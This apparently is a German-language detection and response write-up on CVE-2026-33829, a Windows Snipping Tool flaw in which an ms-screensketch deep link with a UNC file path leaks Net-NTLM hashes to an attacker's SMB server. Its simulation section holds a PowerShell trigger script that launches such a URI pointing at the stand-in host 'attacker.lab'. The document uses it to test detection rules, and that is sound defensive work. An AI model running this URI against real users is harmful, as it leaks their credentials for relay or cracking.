Folgen 
Zusammenfassung
Eine Sicherheitslücke im Windows Snipping Tool kann Net-NTLM-Hashes vom aktuell angemeldeten Benutzer an einen entfernten Angreifer freigeben. Das Problem wird durch einen bösartigen Deep Link ausgelöst, der den ms-screensketch URI-Schema missbraucht und Snipping Tool dazu bringt, eine auf einem vom Angreifer kontrollierten SMB-Share gehostete Datei zu öffnen. Obwohl das Opfer den manipulierten Link anklicken oder öffnen muss, erfolgt das Leck der Anmeldedaten im Hintergrund lautlos, wenn Windows die SMB-Verbindung initiiert. Dieses Verhalten kann Angreifern Zugang zu NTLM-Challenge-Response-Daten verschaffen, ohne dass der Benutzer eine sichtbare Warnung erhält.
Untersuchung
Forscher fanden heraus, dass das ms-screensketch Protokoll einen filePath Parameter akzeptiert und nicht richtig einschränkt, dass beliebige UNC-Pfade verwendet werden. Wenn Snipping Tool versucht, auf einen solchen Pfad zuzugreifen, versucht Windows automatisch, sich beim entfernten SMB-Server zu authentifizieren, wodurch die NTLM-Antwort freigegeben wird. Um das Problem zu validieren, erstellten die Forscher Proof-of-Concept-Skripte, die einen SMB-Listener starteten und eine bösartige URI generierten, die in der Lage ist, den geleakten Hash aufzufangen.
Abschwächung
Microsoft hat am 14. April 2026 ein Sicherheitsupdate veröffentlicht, um das Problem zu beheben, indem das anfällige Deep Link-Verhalten aus dem Snipping Tool entfernt wurde. Durch die Anwendung dieses Patches wird verhindert, dass die Anwendung automatisch von Angreifern bereitgestellte SMB-Pfade über nicht vertrauenswürdige URIs öffnet. Organisationen sollten die Bereitstellung des Updates auf betroffenen Windows-Systemen priorisieren, um die Exposition zu beseitigen.
Reaktion
Verteidiger sollten Versuche überwachen, das ms-screensketch URI-Schema aufzurufen und auf ausgehende SMB-Verbindungen zu ungewöhnlichen internen oder externen Hosts achten. Systeme, die das Snipping Tool nicht benötigen, sollten das Protokoll soweit möglich einschränken, und die Bereitstellung des Patches sollte ohne Verzögerung durchgesetzt werden. Jegliche exponierten NTLM-Hashes sollten umgehend auf Anzeichen von Replay, Relay oder anderem Missbrauch untersucht werden.
graph TB classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef technique fill:#ccffcc action_user_click[„<b>Aktion</b> – <b>T1204.001 Benutzerausführung: Bösartiger Link</b><br/>Der Benutzer klickt auf einen bösartigen Link, der die Ausführung auslöst.“] class action_user_click action tool_snipping[„<b>Werkzeug</b> – <b>Name</b>: Snipping Tool (ms-screensketch URI)<br/><b>Technik</b>: T1204 Benutzerausführung<br/><b>Beschreibung</b>: Wird über den ms-screensketch URI-Handler gestartet.“] class tool_snipping tool tech_smb_conn[„<b>Technik</b> – <b>T1550.002 Pass the Hash</b><br/>Das Snipping Tool verarbeitet einen filePath und initiiert eine SMB-Verbindung zu einem vom Angreifer kontrollierten Server, wodurch Hash-Erfassung möglich wird.“] class tech_smb_conn technique tech_hash_capture[„<b>Technik</b> – <b>Anmeldeinformationszugriff</b><br/>Der Angreifer erfasst den Net-NTLM-Hash aus dem SMB-Authentifizierungsaustausch.“] class tech_hash_capture technique tech_lateral[„<b>Technik</b> – <b>T1550.002 Pass the Hash</b><br/>Der erfasste Hash kann für laterale Bewegung oder Privilegieneskalation wiederverwendet werden.“] class tech_lateral technique tech_c2_web[„<b>Technik</b> – <b>T1071.001 Anwendungsschichtprotokoll: Webprotokolle</b><br/>Der Angreifer kann HTTP/S-Webprotokolle für Command-and-Control-Kommunikation verwenden.“] class tech_c2_web technique tech_persistence[„<b>Technik</b> – <b>T1574.006 Ausführungsfluss-Hijacking: Dynamischer Linker-Hijacking</b><br/>Mögliche Persistenz durch Hijacking des dynamischen Linkers im Snipping Tool-Prozess.“] class tech_persistence technique action_user_click –>|executes| tool_snipping tool_snipping –>|initiates SMB| tech_smb_conn tech_smb_conn –>|leads to| tech_hash_capture tech_hash_capture –>|enables| tech_lateral tech_hash_capture –>|enables| tech_c2_web tool_snipping –>|may lead to| tech_persistence
Angriffsfluss
Simulationsausführung
Voraussetzung: Der Telemetrie- & Basislinien-Vorabcheck muss erfolgreich bestanden haben.
Begründung: Dieser Abschnitt beschreibt die genaue Ausführung der gegnerischen Technik (TTP), die entwickelt wurde, um die Erkennungsregel auszulösen. Die Befehle und Erzählungen MÜSSEN direkt die identifizierten TTPs widerspiegeln und darauf abzielen, die genaue Telemetrie zu erzeugen, die von der Erkennungslogik erwartet wird.
-
Angriffserzählung & Befehle:
Ein Angreifer hat sich Zugang zu der Opferarbeitsstation verschafft und möchte NTLM-Hashes ermitteln, ohne Verdacht zu erregen. Ausnutzung der CVE-2026-33829, erstellt der Angreifer eine bösartige
ms-screensketch:URI, die auf einen vom Angreifer kontrollierten SMB-Share verweist (\attacker.labsharepayload.png). Wenn das Snipping Tool diese URI verarbeitet, initiiert Windows automatisch eine SMB-Verbindung zum entfernten Server und leakt die NTLM-Antwort der Maschine. Der Angreifer führt die URI über PowerShell aus, um sicherzustellen, dass das Snipping Tool im Benutzerkontext aufgerufen wird. -
Regressions-Testskript:
# NTLM-Leck durch Snipping Tool – Auslösesskript # Passen Sie den UNC-Pfad so an, dass er auf Ihren kontrollierten Listener verweist. $attackerServer = "attacker.lab" $sharePath = "sharepayload.png" $uri = "ms-screensketch:edit?filePath=\$attackerServer$sharePath" Write-Host "Snipping Tool mit bösartiger URI aufrufen ..." Start-Process $uri # Warten Sie ein paar Sekunden, bis der SMB-Handschlag abgeschlossen ist Start-Sleep -Seconds 5 Write-Host "Aufruf abgeschlossen. Überprüfen Sie SIEM auf EventID 3 mit DestinationHostname, das '$attackerServer' enthält." -
Bereinigungsbefehle:
# Entfernen Sie alle verbleibenden Snipping Tool-Prozesse (falls noch laufend) Get-Process -Name "SnippingTool","SnippingTool.exe","ScreenSketch","ScreenSketch.exe" -ErrorAction SilentlyContinue | Stop-Process -Force # Optional: Löschen Sie temporäre Dateien, die auf der Angreiferseite erstellt wurden (falls vorhanden) # (Setzt voraus, dass Sie Schreibzugriff auf den Share haben) # Remove-Item -Path "\$attackerServer$sharePath" -Force